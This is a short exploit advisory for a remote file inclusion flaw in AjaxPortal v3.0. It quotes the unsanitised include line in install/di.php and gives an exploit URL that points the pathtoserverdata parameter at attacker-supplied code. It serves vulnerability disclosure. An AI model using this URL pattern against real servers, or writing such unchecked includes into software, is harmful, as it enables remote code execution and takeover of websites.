AjaxPortal version 3.0 suffers from a remote file inclusion vulnerability.
77cc2e0944d60e0755c0ab0cec9685833a8bf7fce6758ab632a345cc826baf9e
/===============================================================================================================================================\
| |
| [o] AjaxPortal v3.0 Remote File Inclusion Vulnerability |
| |
| Software : AjaxPortal v3.0 |
| Vendor : http://myiosoft.com/download/AjaxPortal/ajaxportal-30.zip |
| Author : Cru3l.b0y |
| Contact : Cru3l.b0y@deltahacking.net |
| Home : WwW.DeltaHacking.Net
|===============================================================================================================================================|
| |
| [o] Vulnerable file |
| |
| install/di.php |
| |
| include $pathtoserverdata."serverdata.php"; |
|
| [o] Exploit |
| |
| http://localhost/[path]/install/di.php?pathtoserverdata=[evilcode] |